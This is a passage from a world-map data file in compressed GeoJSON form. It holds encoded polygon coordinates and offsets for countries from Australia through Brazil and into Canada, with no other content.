ΎīäǫǾ`ל̕ҔС٠ƱȨίڌ̽ЎàˎǮϰߜˬ஀đӲÒˊĹ̘ƢҎˆˈǢɃȼVŠƴ̀úßǨजʎȪŰ©ŁȐȭþץʴŏ\"],[\"@@ëµ¹ĸÈ¤Þĥ\"]],\"encodeOffsets\":[[[150893,-44438]],[[148525,-41765]],[[151795,-41487]],[[148260,-41478]],[[151887,-41274]],[[151553,-40711]],[[147383,-41078]],[[148803,-39414]],[[140899,-36596]],[[157224,-28094]],[[115900,-26678]],[[156752,-26368]],[[154775,-24054]],[[118217,-21286]],[[152621,-20778]],[[149789,-18668]],[[142807,-17525]],[[142857,-16970]],[[140384,-16156]],[[127588,-15771]],[[128204,-14929]],[[139996,-14135]],[[139508,-14156]],[[139611,-11880]],[[133591,-11959]],[[133754,-11649]],[[139877,-11651]],[[135776,-11574]],[[146616,-12241]],[[145690,-10961]]]},\"properties\":{\"name\":\"Australia\",\"childNum\":30}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ñǱʀ͋ãʣթɊśȝŕV̡ͥťŕƻࣃÑ˿ǥ܋ĶǭśFƵ^׃Čù~·¶½ÚĩČo¦I\\\\wPͥąȻXā]ǁMġÑÝ½iÇOĉLÍfÏ¬ğPčBuTDÆÅjǹőҫǦ«ǶĈǒď´ȌªúoŎÀvqL±Ŕ{cíƼò¨ŔSƨLêoŌGƚŃ२ȐdxMÀZR¸_ð@Ŝcǌ_î}t_aDuvkÎø}Dd~bÒLÚſÊ²ƘǋǼϤǐĜ|òÀ¦ƞXN`TŲAŲNZJłXhȠƑբE͂ͰࠬȱФΆǓ\"],\"encodeOffsets\":[[17360,49766]]},\"properties\":{\"name\":\"Austria\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Փň֍ը£¬ɜ¾ĸƵʮóˠ¨eƕǰœŚ̭\"],[\"@@ݒ࢙ˎǻ΀áƸȋϓ̯ĻȏӯɑǓˋŷĔƃʝ\\\\͹ɵqԃόʞƒǁȆǾƄ˛ʈ౉ٷùʈƺǿƮĬŸɻԹ͐ʴ¢àǬѓʤÛŠǬƤѡȔĲÒƿŦǺŐÂvڲɟ̂ěĔXüÒðT­´ˁƐķǎȸǄˎßӌѽЈéڂը\"]],\"encodeOffsets\":[[[47222,39811]],[[49739,42849]]]},\"properties\":{\"name\":\"Azerbaijan\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@guûƿcy¤«£ŇR§èöcĘÐOōiƃ͇͟ϟչȕů˃LǇԮZپǭ˪ôľʎǳʶ^ƜàÀ̈́ǀÝʔĔŨñ\"],\"encodeOffsets\":[[31287,-2457]]},\"properties\":{\"name\":\"Burundi\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ʦq̈ʣȋ˥wAá\\\\ğí£Í}©͋ʁw՝ɸ£̪ɯǉͫVtɴСºÿƞ˓°Ɠȼ̇{ȟ̆ۚɾèōЂ˘ƮڰêƸǅӨŁđͅ\"],\"encodeOffsets\":[[5831,51994]]},\"properties\":{\"name\":\"Belgium\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ÁÁŏEĕŶǽbmlʻàƋ¿ǃĿQͻɷȍɽ׏ɧÓ֩aлɍÙÃAck_wL˝óVŃjån»k¥cÇ{ȍ࣫ŹžàȹזĀJqႬǷʾ±ՔӇ͞ŚԜѴϠҮyΆДo˚τƌڒׁ\"],\"encodeOffsets\":[[3682,11977]]},\"properties\":{\"name\":\"Benin\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@­ΏȀɃ ɯǂɥӪ̃ǱNC˕ӠͿҒÈĸȡŹƁˈ΋΅Гҭzѳϟ΃ҽƊȗ¨˟ȩΑê຋WíͿļƇVֽ^óºĽV«ko¥¥D·ØsÜÜ­­ÃĆ¿ÇYʕǫM͟ŕïÅćÕDķÚĉSąґӂɗĚԮȬ˪ϞӶȼɪɘ©ˮɈĸď˚ƬǀǠĄΜǿȎĈ®͆ʢUÞʬʌɸЊ¹Şʎޤ̨ʐȒѲXϠŭ\"],\"encodeOffsets\":[[223,15270]]},\"properties\":{\"name\":\"Burkina Faso\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@÷r¢ǆǷ\"],[\"@@ç\\\\ƪnā\"],[\"@@ęÏΒÒ́\"],[\"@@ũĀŠĐȟ\"],[\"@@əqƒɚƫѐĀzɮ͇ùͩ\"],[\"@@|JeƊÊAɪ̻ɖnńĊæŶɫD͍oȉZ¬WɆÕв«ாDΚȍéāőo[Aġğɷ­ĳǽǗĳ|̓ŧǃͱǖӻÞŌİǩÈWŎÖFȠÖŰŦQĀ@ô¦LÆ[ǞLòχzˁĒǍx¥Î՗\\\\ÏPVЇƉʧŒŵūŨуɣ͐ǉনÇ«ˉӴɛȱɩʑή©ӆ£ƛʉ˔ǃſѝƲ͓͝ҁƇ¶ŜɨɉőþÈ̎ơЛȱǻïђḍūǋɓŶ͸ŉ̜iǰ¥ǔàŬǡÌuȦ¿¶ËľŐˠ\\\\Ê\\\\ĮNUå¨ťjƉĜĥNátÉÄ¯ÞL`¤ĖǜLúAºäìȐİ@̚\\\\ÊõïƂɡ̗ɲ~ȸƶƜĚĦ­ĐXfæŰƒȏɐ\"]],\"encodeOffsets\":[[[94157,22025]],[[94079,22357]],[[93339,22708]],[[93755,22920]],[[92957,22620]],[[91076,26876]]]},\"properties\":{\"name\":\"Bangladesh\",\"childNum\":6}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĵ̓˧NǡǭνͻɿѼнҏmƱŐ¥\\\\ȝéɧuÇËÏŵsySyFyĵxÿckkgÞŵXñg¥ÍţśfɏŧŋiБĦƫòwr§î}FγyoµkQ́ÕċAđZ½SōGëÁȫ^ôͺƕɈЯːà^p~àèRQnół~ǴˬŦƪǞįÄ¢«®ǳĎƹ˞GäĜlĄÀŠŠ˸ƩƇŉ¨ħᓞƏ؀˲ܸƈ˶ŭϬ˴Ƿ̨}\"],\"encodeOffsets\":[[29272,44793]]},\"properties\":{\"name\":\"Bulgaria\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ÛĝƄHɜĬXl̛\"],\"encodeOffsets\":[[51822,26505]]},\"properties\":{\"name\":\"Bahrain\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@řǵѡGBņƂôʎƪƄĵ\"],[\"@@ʚďΏ¬Ķ¤\"],[\"@@Ï{̶̀¡ǀĖ`\\\\ǉ̵˙\"],[\"@@ǽWņɀĭ\"],[\"@@͏ɬþĒƻʹЎٱ\"],[\"@@̻źxÌ̄ȅ\"],[\"@@ĹĉrŖĈ\"],[\"@@ćïŞ¬®áWͯǓ\\\\ȓϾ˼|\"],[\"@@Ǐ»Ăńˋ΢ΚЩ\"],[\"@@Ƿ`ʊvÑ\"],[\"@@CȳʣƧďǦȃ¨ËêǊvҌȤęȚ̓\"],[\"@@ʰſǾǇЭųƚĚJ¬ʠǫǌɁĴƇIÐŚ¾Ý\"],[\"@@ӐۑǅȯǄǀěǜǺĖÍ\"],[\"@@ƩĸƀŎPͼɫʈη¶Έ@Ͼ̽xǑŇý·˱\"]],\"encodeOffsets\":[[[-74779,21702]],[[-74794,22968]],[[-75987,22747]],[[-75834,23269]],[[-76636,23444]],[[-77480,24013]],[[-76215,24646]],[[-79521,24832]],[[-77115,24781]],[[-79203,25615]],[[-79609,25301]],[[-78488,26100]],[[-80376,27371]],[[-79079,26526]]]},\"properties\":{\"name\":\"Bahamas\",\"childNum\":14}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@˼Xȗѫϸˇ˵ßɂ˓ʩğ{D©OS«^­To_ðƛSÃ¡M®ëNď¿Ù«§ǟœ_nǇäŕġå٥˲çÆÌ̓τࠉ֮Ṷ̌ͬȶªΎȬVɞƱȦǨ͚¼ݨǗ܌@ƤǍƞ[\"],\"encodeOffsets\":[[19464,45947]]},\"properties\":{\"name\":\"Bosnia and Herz.\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ŘñࣸįkŻº¹ÎŰÊ®fº@ät¶²ZĘQǈR͢ƭʀąKơãÇUoHyÂ±æïh¥@ůŕs­[¯PmƼóŚ~oÝőĢĪƉĖăȌíƎ¯sX}WÅãyÈeƞJǬ_ɀŅɈˇ»OÇaĝ˝ƭʕ^ƳĂɁI{Uo½ßw¶³øÑüÁ~jȏOȃpw¤mÊāJqǃNȑEŅ¯ȥGŕÿ÷µóåëĿ§ýzÃ»TÃj©ƵåʏǢۃăȳȶC¡uw§SßkıěLd£ðÉh֡~ƅĩSĂͥrubŅŜËRķMƯbࠥŸண±çýŹġůÕwKñÓ\\\\íHýĭQM¢ѮБȸجОαজØiƦMϨ}æwʬòŮIlpĶvƪWÆlÊºʂàwl¥{ÚǊ¿Ħïd¹BSjj¬êÄÚzNvSņŘǜĘxň`èÚĸ^ʺQ ØņÌ_jáZƻXrX|¦Ü¢ĊpÜFϬƎѲӒ̂\"],\"encodeOffsets\":[[28824,57491]]},\"properties\":{\"name\":\"Belarus\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ÝŝĔɜuĽ\"],[\"@@˵CÒྪzƀ˞KʄИȒv­ħȀOĿƽԭÌÿğݑӥد\"]],\"encodeOffsets\":[[[-89961,17841]],[[-91027,16272]]]},\"properties\":{\"name\":\"Belize\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ŏgǎĞ½õ\"],\"encodeOffsets\":[[-66283,33069]]},\"properties\":{\"name\":\"Bermuda\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĭއҀޕU฿̇ѥޗAх̽গǉȤࣟ¯ʑѽǉc¡ÈÓƨČĪçŤ͗Ĵѵ`ƕ_íTõäǗŠÛ|Hwyįė»̅đɻʙǡʽƕǽǷZí´Cˢʯ݀Uˌ̣ͰØɰɗƜ[˾ǖŰDÄgįĮEhļƊĦńMpkx̭ʐġŀUž¡ƀÅ̾«Ŝ¨Āǁî}nǕξ@B@UÒĽŠl¢ԔҸWƔǄŚ̽ǄǡѐȾͼǝɰ^ƘЪՂǟФĂڬʚ͆ݥನ̌G͌±ƜďɾĀ˜ˆä|ƀXĨiʲʘۺЬরǀĈι]ęçś³S·Ħ͕VōÇȅǢх͸ʹؚ̨͋˼ǝɼVʬ˟ծƋnçŴƑÐÁî±ǶBÄaĂ^ʌz¬RӐʥŒՇČ֛ŇIƳI¬ŴƥŚƋΟhȗXŗ൚¹DÖf¢r~AIǥĵƅO§fǭƛlŹ¢¡̜șðgÔj»RĉĲɵÚƥúûßÅŵϟµƳÆŉΏיɪȡuÕi»]ÕăÅ[\"],\"encodeOffsets\":[[-59555,-20648]]},\"properties\":{\"name\":\"Bolivia\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ËXȦņƦÑ̯\"],[\"@@åĦłĴș\"],[\"@@ǇMŲƘƉ\"],[\"@@ȗ}İĊĨË\"],[\"@@×§àĬFÓ\"],[\"@@ÚǼÊĥţĕ\"],[\"@@ĉćĮːcȇ\"],[\"@@ř¯ĘĄ§\"],[\"@@ėeɐ̮ŒξʖĞĀĿī̗ҳ΋\"],[\"@@јÆ؊őυࣽǣĽőĐ½ƽɭôçǛǻßɕòχëɅҢĨŸpŏtñƞŴՒͮƀԶĥ\"],[\"@@ɯǑģĐǐƨǄå\"],[\"@@͕f˜ƬŌçÑĩ\"],[\"@@ƯʓΟÈÈǂ҈\"],[\"@@cūƯ¾ɂҌ˧ÿĵ\"],[\"@@ĝiƂȈĺÿȵ\"],[\"@@ƁyǾŰ\\\\ǟ\"],[\"@@ŁĲǡÀ¿Nwʫ̃şݭĘ˝ŒõXŷOƅI½øŻŌʰ˕ΆƥN¶ƢHLżĢ`¢¶ʲÉªňĠfàǜH¤nȒȦGðnÒvQ°ÍÌgФtϴċ´^~PøLÀ²µÀ­âÁnPptzvĖdffHȐĩ̄¢¸VĈ¢ØORÄvJV¥§¦żQrçArYi¡èʬñ̦ȠܪťːˊɌպ֦݈Ęɀ˞ǽь࿫Ɍʯтƛ¸йͩ˝ϯԧѷʵוઁȻJλǃ׼ࢬհǤەʌɇͺƸɾā;ǎ˓ޥƮŸȸӴȂòʀ˼ȺŁĨŎıôfȾˮ΂ҶÌŜąjŞ࿄ؕṇ̌Ɇɂ̘ɣµÅņ®ĨʳǿǳĀĝȒǤ®ǓśÍƗőՋʈɔǬЊļmñ˅ɔȎВæÚłόõ׀˝̼ͬƛࡌĸєÇనܗΪн΢́˚ķńǗӬƹ࢔ƂķҸ๱Aߑэ੓ΡЅŃ`LƉљՕ̵ƿΑͭơ˭EŶˣ܇ˣЭ͏̿ʏ˾ƉƕôįÑȩǏǽ·ȉĎu¹ίĚ\\\\įԽƮ৫˓ૃ¤ѳйңŏ્ǽƛͧ۟ͥ˯Ƒ˧ýɣ гףʻɱɩ¿̭ޓiǑȰÍɡ֥ğÙʢ¢ǃĊ٫ŧŵĔÉً˛śǝяNݩχषڣºŏɯȻbĚǻÕƝɋØĻʔėɝȹöùȳŇ÷ǎީÇ݉ƭпЅʝЋЭҭࣁԹۧऱܙoʆ͐²΄ʢĢ̞ƴrǆɄǘwɺŔYdƼϯīɯˬŠˣĿ͗ÛÞŭαϹɹȅуÈʁѱࠃ׿ԕwJÅzË®@РhÀ|ô¸îêĄĚöì´ύɸƇ̄ƃĖʥĈ̶̯ϕǦ±ç͑ͺtqMo]ţģÅßU«B[ôhż΅͞Υ˺ʍÿŝ˳n³Ö¢ƆĚưɄʊƾࢤ਎ǠWƪԾ˴ɬˈцńШʪƜ۪ȇԶɛŪʏđƟ¦JŤŚǴĊžۆƬ¨ÀtfǕŪƻơ̈ƉĉoħgûZã\\\\£wð@Ö_Ę¹ºi áކŇƆMĐăĒţxǕ@±bűƠ«`˝ƹ঱ŸZʼĦڨíʶÁoǊm¦|¬[²kÖÆ\\\\ÖĄ¼^ÖjvƙŮďôΒך]ń©F¶ƴŶϠàÆùüÙƦıɶQĊ¼ÓiïhǷŴţæ¡¢kźƜeǮP¨ĶƆJǦ}B¡qÕeC൙ºWŘgȘΠřƌųƦ«ʼTċ֜őՈӏʦ«Qʋyā]ɹ`í²ÏÂųƒmèխƌȿǊ«ŖɹU˽Ǟؙ̧͌ͷʺǡц²̔ĥ͖T¸´èŜ^Ěćκযƿ۹ЫʱʗħjſWã{˛˅ɽÿƛĐ͋²ȝPĭGăEƑlķFė«ŻÃÏa©E¥R·éà¿}୞¶ƶÇs{]ͻ˹×ȉŗۻ]ǕвۣĊĴŪĶŪGńąĢŏƐĉÆ·ƦjŵĦƵЄXþ|¯^Õì©ti|jjp|KńǸ|vŘȖԸτĉ̲vÎ Ąƶʢþњ²zŐxú¶ŜĞĮĬĆΊȴܸżĞĶÈ´à^ǆQłd¾v«à¯Ģ^Ú¤LvLÆfɺ಄ɨఈȟּν̶b׾ӨŶˎÑƅ͢ґRHղචXãŀÀŢɐȧ҈̲ʀ΍ѥǦѼϥʌf͈ǖƄşŽêF̴ΖݲΠǒͶӜȌɌցúƥ࣮ϕΦĳɜǲŕ͒[ƞǓָ^К̍ŨΦʪŜɐ·˨ĊҔːɸfͰΐËǸx{TøhǊ¨nÖUĀ¸ČgŶſƃңϘƱ\"]],\"encodeOffsets\":[[[-49649,-28433]],[[-49750,-27035]],[[-46346,-24462]],[[-45188,-23697]],[[-39837,-13796]],[[-39673,-13411]],[[-45567,-3010]],[[-45960,-1349]],[[-53076,-1468]],[[-50819,-234]],[[-51868,-134]],[[-50630,-115]],[[-50931,275]],[[-51636,143]],[[-51356,403]],[[-51506,1986]],[[-61132,4458]]]},\"properties\":{\"name\":\"Brazil\",\"childNum\":17}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ıjǜȂųÇÑ\"],\"encodeOffsets\":[[-60921,13396]]},\"properties\":{\"name\":\"Barbados\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Ĩ@ŴҟƷãє\"],[\"@@ɽƳĀ˙ƽ̗ӷҰ̢ÌӒ̤Ĺ\"]],\"encodeOffsets\":[[[117788,5018]],[[117788,5018]]]},\"properties\":{\"name\":\"Brunei\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ǝŰīĞGČhQ®í×«ÛyÉSLiÅL»q§gſCƝ§ŻJ½º{@ŝÝҟcͥĲşéýƯ}ƭmŻdoºɇÎƹě¤ƵĆĳǶlĸâTf´Ű҄Ԅ² ĮªĆ|ÊÌæêb̰É^w{Ĺh[ľSźPîMʲď´HŰĆ P]¼ɲĉSƍ\"],\"encodeOffsets\":[[93832,28427]]},\"properties\":{\"name\":\"Bhutan\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@_ƧגࠁȖԋࡔҿĒͅͰqSһ̂Ыࡘȱbȃǎ½àß¦ȡgĭÅÉĭęïՇǳͭΏֵέȿ֍ǽŽƓƽ¯ɡµĉĵͥޑʯÿݏ\\\\řĠȉNÙtщʺȫFɩƙɿ֥£ÝɇƛŁǇã±ȇ×§ąߣOĉĚŸ۞̧٦ϙ̶EᙶࡄIᵦሶˎ͌ϯզξʌ{͆Ț̌z\"],\"encodeOffsets\":[[25865,-18220]]},\"properties\":{\"name\":\"Botswana\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ڊअoЛŻȍÎʣԠųŨ̽ҾŻ̈ˡgɁĈŉ࣪ڕ­ƯǦ͗Պ̃ɒԩ˥úȿřટɀϭ́صvݷˣҫ¼ωӵ༩˞˧̰ΛɔʱγȣЋқ`ܱŕŨˁĻ֙ǀ݋Ƴţ֣ʇҽĵ՜޹ޘÃϪ˩ˊƗ֬®ӮƻƤʶȮϾުɰˊВaΞƨƖƶȪ˃ܪζޒ¾ҜԢȇƲÐĒୖǂβɺވݒô̔؈̮̔Ý\"],\"encodeOffsets\":[[23409,11182]]},\"properties\":{\"name\":\"Central African Rep.\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ˣ\\\\͠¤»¿\"],[\"@@œ­ĂƪĻ\"],[\"@@ĵÌƚR£Ý\"],[\"@@ƍWʈĸĹğ\"],[\"@@ͥyɰĶǰŦùȡ\"],[\"@@ȬǍɽ˒¢ɸǼɭWκ̖Ôī̤nǽۥ̍ԡcƓŤϢҎՂϲǨÜɡƋϻԡ˙\"],[\"@@ŊĀҪŝघAуǿKȍЫøń´ƉĎàüȡſΫÐįƘ̑xsƦɃͨΞÿʉɶʵ\"],[\"@@ŢqȡuìǈѺǲѥ̑\"],[\"@@ĉǔȪĉǥ\"],[\"@@ॴΠͰӮࢨҔ܈Ǥذɶࢢ޺ਞֆႺӲૼkԶˋʡɦųēɣއͷ֕Ƙٹƕ̂іųȰȫԘƪʢĹǫ̙ͿɣЦ§ȧ˺ӧՂÙì·ȋï̔ƍࡄį¥ýɤuѸȸƮǱʆŤħÌŏƯ×ΰÙቱկʡKǟ͝ƒďƁÇĊıTǹ৥ۇɋűȠȧfÉˤ˚Φɹŏ²Î൤ۨˀ˃ǎ؎ŮోSҸИƕ{ųŠūʷगΑȍĀêĎ΍ˑε{ɃĒȯHÇΰ̳ľIଘέɜכœħǸǉٝىʏګӋՓϳhǃʃᥫEA\"],[\"@@zùƓŚ¸\"],[\"@@țûÝâʺZ\"],[\"@@ĦéʯÇPĮƺ\"],[\"@@ʡĦZĴǂLĆȥ\"],[\"@@ਫŌோ֌̔°੮ȣ࢖Οĸŧė\"],[\"@@įˈȒǋġĻ\"],[\"@@෺˕նڋۮʱоաĚôâɓɗó˿Âৡ̀ɪɢƺĩǕҿã˵ƄƺĀʵÀbźӫImǌ΂è͟ ͇ȌǯÃœɒċïıĤͫˊΚjƮӻíʍȸάĮ؄ȃ\"],[\"@@Ŀůϓ¹Șʛ޳ࡵ÷ͥդтdƥֆՙ̧ɪ¨ǽǿײįĪŖĻέ܎ϔ°ǓЬĦ˴ĵƱӳ̓ʸpħĕɔ§΃ɗࣲȬĝțЉǍĳʥËȚIȍȓǈś̌͞ΖĬʭԍȌƌǺňȁϯݥǩÀɡáOю΋ʳƏ˘ҺŝˈǟĔʝϥ\\\\Ŧ͏ƋϫЕЇŋŲάŦרшӧGǫǏҩɖøRȐޓɇಿƔٽƇǡƔ¤ɒ߈Ѷ۱˚ǂÃąǆ©ˀФΎąĝøĴŸǯzmņǔƀȌ«œǰвڰɈĠĳìɚˀ̔˒րȤˮćrĜǪ\"],[\"@@ȋŸİèĜȟ\"],[\"@@ɓ¸̼Üħœ\"],[\"@@ÑʞǊôķ͑\"],[\"@@વʬǊŖײhͺϩ\"],[\"@@Ĵɯ˳ѢƫœĻ˦ƍ»ĥƪWßřߍՊlǺͷŚژ¸\"],[\"@@ΝƙȕÉЊŹõɵʔŤ˄Ͷƕäơ\"],[\"@@ſrðǂÐǳ\"],[\"@@֛̈́ÈòюǏǆǇÿÝ\"],[\"@@ůĩˍ¢Ɍǔǲŋ\"],[\"@@̒yŘṯ̌ʭ̈¬̌ϼĚʑۧ͝ĵͳĸ˔xΛƜȟˤ˒ͤ\"],[\"@@jŸŰcƙœ\"],[\"@@̤Ɍœǯȏ\"],[\"@@áäВƮͯɑ\"],[\"@@ȩ͋M˞ˁ˳ɧÉȄ˒ϋȣѼծß̟ɞΜ˰˫\"],[\"@@Ěř̽ŎɤL\"],[\"@@ûÓÆƒvý\"],[\"@@ǋã¦ƺŦĕ\"],[\"@@Íʝàĉłΰœ\"],[\"@@őØɾɮɦřΑǫ\"],[\"@@ŗWΪĐʑ÷\"],[\"@@ԋʆդZʟ\"],[\"@@Œū˳ƒǢe\"],[\"@@ɒƏȅЯγϗȊJʔ˪ʆ͎f\"],[\"@@̞oYıΡHÞŚ\"],[\"@@έ¤ϡɶٸŝĘƻ\"],[\"@@sȋҕ˝ϕǋֵ£Ǳʚ҆Ϛୂ¦\"],[\"@@̀ȣ·ĳӿʸֈ \"],[\"@@ֿǎȚĀИƭqğ\"],[\"@@ΘǔΖȫႆӗ̾γǯǑࢸØѶ˟سʧ૧ȶõȄ۱Ǽૡۭٓǃ́Ӧ୏īȂˈְȢĹήʦ߾Ѩ͔͈ƟÁȣːȽ\"],[\"@@Οƴ­ɒͤſêʅ\"],[\"@@аåĉëډŠʍ̠ԶƓ¼ƙ\"],[\"@@ʌMśşůŮ\"],[\"@@ǅNϤłɝŏ\"],[\"@@§ëǛĤĒȢŲə\"],[\"@@ߝŏȨ৴ÇòǧǷS\"],[\"@@ʟĎÉɜɐǤɾĹƣϓ\"],[\"@@ԈűĻ׵ӟƧএ̡κƮɘѼ˨ޜ\"],[\"@@ǇÒȆö}Ƈ\"],[\"@@ѕźϘD¾Ž\"],[\"@@ѥƪĦƌʮĒʣ\"],[\"@@ϱĄʜŦɾÓħƕ\"],[\"@@͇~ɖ̊ȁ\"],[\"@@ǛkŚƄĭ\"],[\"@@Ǣވ˲ϑλγė\"],[\"@@ŋƕƉİʖ¦\"],[\"@@͑ŊǈƔѨ×˝ȅ\"],[\"@@šƮˀĩƝÃ\"],[\"@@ÜǏʗÛǴñǩdɈ̦\"],[\"@@ʳÜˀÆKš\"],[\"@@UěڷĿێȜ\"],[\"@@ĹſгFÎĿۇư̶Ğ࠲S\"],[\"@@फ़ʣҤϑОÓ࣏॑̕Ô܉ʤ͏Ǜň̋ÍȫĆƠࡀǠùȨъĭƅ˺ΈÄ̎ǿ\"],[\"@@̖įٟîΊ\"],[\"@@­Gȟ{ͻǕΗʭ̯ȍՑԩٵ@ܥFɗMĿ˝įöœr­MƟõÆÓɏƇࣗ͏ٽıЕŧϻǵϷǵɁ@ϝʨɲӄ̘̾܌ªĆ̅ౚÇɜ̱ƞ֡ʤļƬūĺ̥ũΘˉGȋǭ̚ǍäӧȬࡩΔ҇ǲ҉ǴՓȰࣝʳૻŔȷÀ˿ŕԱȴ˽sÇ@ïƄ˯ŐΟ¼ĳWˣùŧæ٥ŖûĸùŜµɌNʧÆMͅȣBܑ@Ω@ܑ@੻@⿿@、@、@ᅍ@Χ@Ω@੻@ີ@ć@čąƓʂ̌Ŝͭ¯ö˰˽ʃлǦŐƨűȠĂʕ²¤΂ĵʷʟēсȼɱͰǔϢǗ̝ΕaÁŶďƵϟ̓øҚİԡsŞƄŭzJǈĩšΧ¡յʄʐϨؒĄիHˣȕƳǐ°Ѥ̜ƒǐѺ˫ЕͬȰʚÉúǃ؍̧ʻсɋ̶ːƆĈȒ˧ƵȀҢʽíƇˆұȐùƔˈƞ§ų̃śΈEǢţɻǪϽÒõǊȜĤΫaʣΡʱƕ٫ЈʖΆΖĆϩ£̃Ȭܴ࢔ȟĈɅхݦëƄ˅\\\\ÁĞƟەʘ̑ǞȧÄĆɳł¸Æ¢®ÍÞšŌěþϛϘɯɲɫɾ֟̆ģøÁÎʅǆɡöěʒˇƒ˭]ԳĽĿǁiĥʵȟCˁğŵ«ƉíçZÓʼ؋͔ҧˮˇŚ¢ö¶Ĝ@ÂŽGχUʟũЕĮÕåȥȩ@Ӭ@݄@௰@݄@௰@݄@௰@݂@݄໒ŕྞҧग़çܨǕ֯ʒ̨¬˭îȀǘͲEŶƈֺT¢ǢѼƥʛɉࡖƴȼǐј|íâ˚ࡸǞЄȄ؄ɨĐxǏহ̃गį݉ˡԍ̣ɾćǕöْZšȚ޲̒϶Ñɘøþȭܒі਀ȸɑƓĔċǜ¨চђУƄưžٞɷࠎف؎ǋ̒ÜƹǖӶ̨ȇμľŰ͑ʂÝǵ˙ںrцΞߦLजŽ۔ɽណϻঘÛƹŘڪےǏր̅ōō֙F̥řʳȕʨëᕊŗ౜ĞޔǞόɓӾƼɥȨƨՀ˻EƉчEਤ׋ϛ˺]ȴӌđک߀ƈǾାƐ֤͢שÛųƅࡕuĩƁӵgͩŦ;˂ᅰʸДùʸΑ،ƷƔƕ࡚ªॺ͇٠ૼŪઘĥђæȁɠপϥȼȨҁļϡ¯ϩφζΤÎŋŘўwθȭҠ²ʕɭلǰͯةȒȧΞµō̦{EţࡇՔιȽː՘ZŢˀͣЎǆʄ׺¦ઞҢ͹͎ǳǹ҇fѢːƝǆՔĔŇǇǺɊاşǎǁÓॣȎӯ΂ɈʨΚOŨ̹©ʓƖĒβ͔ƤмÝƂžϹæग़ΈΪǽҾmڢЗ·஖ٍ֣´Ǉŋ҈Åމ̵ӜJʹţ׮ĪȧĳࡲÍЏǃ́fِͻāͿ̴ǽަ࠼ࢴ˹ΆӍáąϡ˳ߢٯڤʰޘ৾ٴÖȩÒȶȖѳƄĵԨ᝜ŻȔ÷̩ęώíêƉ܌¿ӣʫӜČǉՏǗՙWˤʩǮ¤˧ִ̩ơΫ࿃ו्Ԑʵ²ɣĹ͂xўɃ̖ϿΥà˭ëࠍ̢कpƋؐȯళٻѣT๻ӲşÉಋâ͖ı¶øࢺśߚε࿒ųࣟ࡝ױǅ͏ĸÎũПÀǏŲȗƼƹʿn\\\\ʏցğছȰ̙ଝ̠ŘɿʒqĝĜਆɍʷŗԼŤܺɉɬ͇ؿɓދ`ΦȑԫǷǑȨƳ֫ǒʦűΫʁȻRɨƥԍʇԅ݃ɃęwਗƙǗ֞̑ΙǬτߎUظ୿ུ̫ͭˮ࿘Ϳܾ͑ӾϑྡྷЗ˺ǇŭɧʰǦॴ|౤ȹƤɉǣӋʄΩųڋ׊ԇȓǫ̤g݆ҋŪɻ΃ɛ̼ƶ̾qٌѩ͝ΤͲϊʢƑŚəƠʠɁɸ҆Фʝ̙ͨࡂĖ̄ȷĆĂÐӅф࿀Զঞބà׊ʅ٠̤̅ଝ֎يזʞ̈́ćŕĚǐ˲ʝÈŐ¶ȓʀƬĬʋĈǜƚӻT֖ئэɶĥϚٖʒಲɍxŗϖŐ׬Ǒ[Ą߈ɘࡤ̉íʅɢèɼùƾŵƩý̎ĐȒÓǹƩδɿ०÷ʊǱЪƸĊǋ̕΁ð̩࠙¥ޞěªӝ˴ƿηĭ£ŕŔ̷Ǐ̬ÑѦǐӖjˈƉŸɑŅˑַɕՄŰͤθŐǃƧſʶɠàΏĞȈ܈ɸ̠ʨ̢̡͞˔Ǡ˴ˇźʎĐÁžξç̳ŶsȦ;KťŘ̖΢ˊ¿äą̉ƅРª¶˓ƜæʲʻǏōƜēȤ²ľřұş؈\\\\ǙȚVƪǥ֍˽˞ŚԬNǽɯϗƻٴŜƲƳ̆»SʥѷĻӘË±ơզȥˡुĶٔɳǝđў¿ʍŉ̊]Âƙů©̢Ň̄ÚƴǷȄ¶ÉœǼƙΥΝܞȾÎĥɂiͱ̥Ӡ͖ɘ¥Ǿʽ͎ÃμĐҶʅʛǣءƃǕƭৃǷ˓ȧȿ¶ʜƕȕȃඬײ׺Ĩ͍płĨٴÅʀ̷͛ƯǊţЬɪ͂tоʙƘɑIӍѫĉӠÏ}ġȟ~ˈɋ੿ֱಅƋୁࠓ໵ǳǍňڝÌṽ÷Ϗǽαթއŵୣ࠻૿Ɏॸʃú×ȁ̝ׯԋҿ˿ԣğएБзЅһȣɷ|˺ƻ؟˻\"],[\"@@ʻºȘǊäɃ\"],[\"@@ߎ¸ʈʢҐఞɭԿ̛Ȃ±ం̤ϣ̆ոq੆εӊ۝̀ćюɦ޳੊ǬǘಠŹࣈ΁ࡼৱŇљ޲εюĹzŪ଼̓